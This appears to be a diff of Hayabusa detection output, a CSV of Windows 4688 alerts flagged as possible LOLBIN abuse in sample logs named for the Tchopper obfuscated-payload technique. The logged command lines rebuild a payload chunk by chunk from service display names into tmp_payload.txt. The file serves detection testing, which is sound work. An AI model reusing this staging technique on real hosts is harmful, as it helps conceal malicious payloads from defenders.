+2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
